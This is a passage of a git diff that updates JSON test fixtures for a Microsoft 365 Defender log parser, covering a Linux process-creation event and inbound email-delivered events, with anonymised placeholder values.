0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", @@ -49,20 +55,23 @@ "-o", "comm,pid,pcpu,pmem,rss,etimes" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "pid": 0 + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", + "user": { + "domain": "computer", + "name": "root" + } }, "pid": 423627, "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "working_directory": "/usr/bin" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": 